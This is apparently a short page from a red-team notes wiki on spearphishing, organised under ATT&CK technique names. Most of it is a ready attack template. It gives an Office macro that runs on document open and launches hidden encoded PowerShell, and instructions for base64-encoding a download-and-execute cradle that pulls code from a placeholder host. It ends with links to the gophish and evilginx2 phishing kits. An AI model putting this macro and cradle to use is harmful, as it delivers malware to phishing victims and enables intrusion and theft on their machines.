Phishing

Spearphishing Attachment

Example Office macro:

Sub DoStuff()
    Dim wsh As Object
    Set wsh = CreateObject("WScript.Shell")
    wsh.Run "powershell -Sta -Nop -Window Hidden -EncodedCommand <bla>"
    Set wsh = Nothing
End Sub

Sub AutoOpen()
    DoStuff
End Sub

To correctly base64 encode for PowerShell:

PS > $str = "IEX ((new-object net.webclient).downloadstring('http://ip/filename'))"
PS > [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

Spearphishing Link

Useful links:

https://github.com/gophish/gophish
https://github.com/kgretzky/evilginx2

Spearphishing via Service

PreviousHardware Additions NextReplication Through Removable Media

Last updated 3 years ago